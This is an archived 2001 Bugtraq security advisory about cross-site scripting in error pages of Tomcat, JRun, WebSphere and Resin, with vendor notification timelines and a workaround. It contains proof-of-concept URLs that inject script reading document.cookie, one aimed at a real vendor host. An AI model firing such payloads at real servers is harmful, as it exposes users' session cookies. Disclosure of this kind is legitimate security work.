Bugtraq mailing list archives
Multiple Vendor Java Servlet Container Cross-Site Scripting Vulnerability
From: "TAKAGI, Hiromitsu" <takagi () etl go jp>
Date: Mon, 02 Jul 2001 20:31:00 +0900
Multiple Vendor Java Servlet Container Cross-Site Scripting Vulnerability
=========================================================================

Affected products:
=================
Tomcat 3.2.1, 3.2.2-beta, 4.0-beta
<http://jakarta.apache.org/tomcat/>
JRun 3.0
<http://www.allaire.com/products/jrun/index.cfm>
WebSphere 3.5 FP2, 3.02, VisualAge for Java 3.5 Professional
<http://www-4.ibm.com/software/webservers/>
Resin
<http://www.caucho.com/products/resin/>

Not affected:
============
Unknown

Problem:
=======
Accessing the following URLs, the JavaScript code will be executed in the browser on the server's domain.

Tomcat 3.2.1:
http://Tomcat/jsp-mapped-dir/<SCRIPT>alert(document.cookie)</SCRIPT>.jsp

JRun 3.0:
http://JRun/<SCRIPT>alert(document.cookie)</SCRIPT>.shtml
http://JRun/<SCRIPT>alert(document.cookie)</SCRIPT>.jsp
http://JRun/<SCRIPT>alert(document.cookie)</SCRIPT>.thtml

WebSphere 3.5 FP2:
http://WebSphere/webapp/examples/<SCRIPT>alert(document.cookie)</SCRIPT>

WebSphere 3.02:
http://WebSphere/<SCRIPT>alert(document.cookie)</SCRIPT>.jsp

VisualAge for Java 3.5 Professional:
http://VisualAge-WebSphere-Test-Environment/<SCRIPT>alert(document.cookie)</SCRIPT>

Resin 1.2.2:
http://Reisin/<SCRIPT>alert(document.cookie)</SCRIPT>.jsp
http://www.caucho.com/<SCRIPT>document.write(document.cookie)</SCRIPT>.jsp

These pages produce output like this:

=================================================
Error 404

An error has occurred while processing request:
http://WebSphere/webapp/examples/******

Message: File not found: //******

StackTrace: com.ibm.servlet.engine.webapp.WebAppErrorReport: File not found: //******
at javax.servlet.ServletException.<init>(ServletException.java:107)
at com.ibm.websphere.servlet.error.ServletErrorReport.<init>(ServletErrorReport.java:31)
at com.ibm.servlet.engine.webapp.WebAppErrorReport.<init>(WebAppErrorReport.java:20)
at com.ibm.servlet.engine.webapp.WebAppDispatcherResponse.sendError(WebAppDispatcherResponse.java:97)
...
=================================================

******: The JavaScript code is executed here.

This vulnerability is quite similar to "IIS cross-site scripting vulnerabilities (MS00-060)" reported by Microsoft on August 25, 2000.
<http://www.microsoft.com/technet/security/bulletin/ms00-060.asp>

Impact:
======
For the detail about cross-site scripting, see the following pages.
<http://www.cert.org/advisories/CA-2000-02.html>
<http://www.microsoft.com/TechNet/security/crssite.asp>
<http://www.apache.org/info/css-security/>

Vendor status:
=============

Tomcat:
======
Notified:
16 Mar 2001 04:32:02 +0900, I-found-a-security-problem-in-the-apache-source-code () apache org
17 Mar 2001 18:55:45 +0900, tomcat-dev () jakarta apache org
Response:
17 Mar 2001 20:07:42 -0000
Fix:
30 Mar 2001, Tomcat 4.0-beta-2 (maybe)
11 May 2001, Tomcat 3.2.2-beta-5 (maybe)
Announcement:
<http://jakarta.apache.org/tomcat/news.html>
Sun Microsystems does not publish Tomcat vulnerabilities.
<http://java.sun.com/products/jsp/tomcat/>
<http://java.sun.com/sfaq/chronology.html>

JRun:
====
Notified:
13 Mar 2001 23:11:54 +0900, secure () allaire com
Response:
13 Mar 2001 09:43:49 -0500
14 Mar 2001 09:05:03 -0500
Fix:
28 Jun 2001, Patches for JRun 3.0 and JRun 2.3.3 are available.
Announcement:
<http://www.allaire.com/handlers/index.cfm?ID=21498&Method=Full>
Macromedia Product Security Bulletin (MPSB01-06)
JRun 3.1, JRun 3.0, JRun 2.3.3: Cross-site scripting vulnerability (a.k.a. JavaScript code execution vulnerability)

WebSphere:
=========
Notified:
20 Mar 2001 08:13:30 +0900, *******@us.ibm.com
Response:
22 Mar 2001 09:14:01 -0500
23 Mar 2001 00:02:58 +0900
Fix:
PQ47386V302x (?)
<http://www-4.ibm.com/software/webservers/appserv/efix.html>
Announcement:
<http://www-6.ibm.com/jp/domino01/software/websphere.nsf/TechWeb/EC48D03C7060EAFA49256A1C0009C9F4?openDocument&&ViewName=TechWeb> (in Japanese)

Resin:
=====
Notified:
16 Mar 2001 02:26:47 +0900, bugs () caucho com, resin () caucho com
Response:
None
Fix:
Unknown
Announcement:
Unknown
http://www.caucho.com/products/resin/changes.xtp

Workaround:
==========
Customize error pages.

--
Hiromitsu Takagi, Ph.D.
National Institute of Advanced Industrial Science and Technology,
Tsukuba Central 2, 1-1-1, Umezono, Tsukuba, Ibaraki 305-8568, Japan
http://www.etl.go.jp/~takagi/